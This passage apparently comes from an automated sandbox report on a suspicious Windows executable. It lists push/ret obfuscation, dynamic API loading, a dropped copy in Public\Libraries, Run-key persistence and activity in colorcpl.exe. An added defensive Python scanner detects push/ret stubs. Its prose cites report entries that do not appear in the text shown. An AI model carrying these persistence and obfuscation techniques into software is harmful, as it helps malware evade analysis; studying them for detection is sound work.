          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217FFA3 push 0217FFF1h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02188C58 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0218EC64 push 0218EE54h; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 1_2_06E6D0D1 push ecx; ret
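Each "push <imm32>; ret" entry above is an unconditional transfer to the pushed address written without a jmp or call, which is what the signature "Uses code obfuscation techniques (call, push, ret)" refers to; the "push eax; ret" and "pushad; ret" entries transfer to a value only known at run time. The Python below is an added example, not code from the report or from the sample: it scans raw x86 bytes for push imm32 / ret pairs and resolves the effective jump target, flags push reg / ret pairs as not statically resolvable, and renders hits in the report's "address push target; ret" notation. The byte buffer is constructed here to reproduce the first entry (0218F2A4 transferring to 0218F310); it is not bytes taken from the sample.

```python
import struct

PUSH_IMM32 = 0x68                              # push imm32 (5-byte encoding)
RET = 0xC3                                     # ret
PUSH_REG_FIRST, PUSH_REG_LAST = 0x50, 0x57     # push eax .. push edi (1-byte encoding)

# Constructed buffer (not bytes from the sample): a push/ret pair reproducing the report's
# first entry, two nops, a push eax; ret, and a decoy push imm32 separated from its ret by
# a nop so that it is not a pair.
SAMPLE_BASE = 0x0218F2A4
SAMPLE_CODE = (
    bytes([PUSH_IMM32]) + struct.pack("<I", 0x0218F310) + bytes([RET])
    + b"\x90\x90"
    + b"\x50" + bytes([RET])
    + bytes([PUSH_IMM32]) + struct.pack("<I", 0x41414141) + b"\x90" + bytes([RET])
)


def find_push_ret(code: bytes, base: int):
    """Linear scan for push/ret control-flow transfers.

    Returns a list of (va, kind, target): target is the resolved jump address for
    push imm32 and None for push reg, whose value depends on run-time state.
    This is a byte-level heuristic, not a disassembler: an immediate or another
    operand byte can itself be 0x68 or 0x50..0x57 and yield a false pair, so
    confirm hits with a real decoder (e.g. capstone) before acting on them.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        if op == PUSH_IMM32 and i + 5 < n and code[i + 5] == RET:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, "push imm32; ret", target))
            i += 6
        elif PUSH_REG_FIRST <= op <= PUSH_REG_LAST and i + 1 < n and code[i + 1] == RET:
            hits.append((base + i, "push reg; ret", None))
            i += 2
        else:
            i += 1
    return hits


def describe(hits):
    """Render hits in the report's 'ADDR push TARGETh; ret' notation."""
    lines = []
    for va, kind, target in hits:
        if target is None:
            lines.append(f"{va:08X} {kind}")
        else:
            lines.append(f"{va:08X} push {target:08X}h; ret")
    return lines


def in_region(target: int, base: int, size: int) -> bool:
    """True when a resolved target lands inside the scanned region, i.e. a local
    jump the obfuscator rewrote, rather than a transfer into another module."""
    return base <= target < base + size


if __name__ == "__main__":
    for line in describe(find_push_ret(SAMPLE_CODE, SAMPLE_BASE)):
        print(line)
```

Run against the constructed buffer the scanner reports the imm32 pair at 0218F2A4 with target 0218F310 and the register pair at 0218F2AC, and ignores the decoy. Resolving the targets is what lets an analyst rebuild the real control-flow graph of a function the report only lists as a sequence of push/ret stubs.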
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,
          Source: C:\Users\user\Desktop\0321423605241625.exe | File created: C:\Users\Public\Libraries\Mwqrxeuz.exe
          Source: C:\Users\user\Desktop\0321423605241625.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz (2 identical entries)
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021854F4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\0321423605241625.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX (49 entries)
          Source: C:\Users\user\Desktop\0321423605241625.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX (50 entries)
          Source: C:\Users\user\Desktop\0321423605241625.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (3 entries)
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
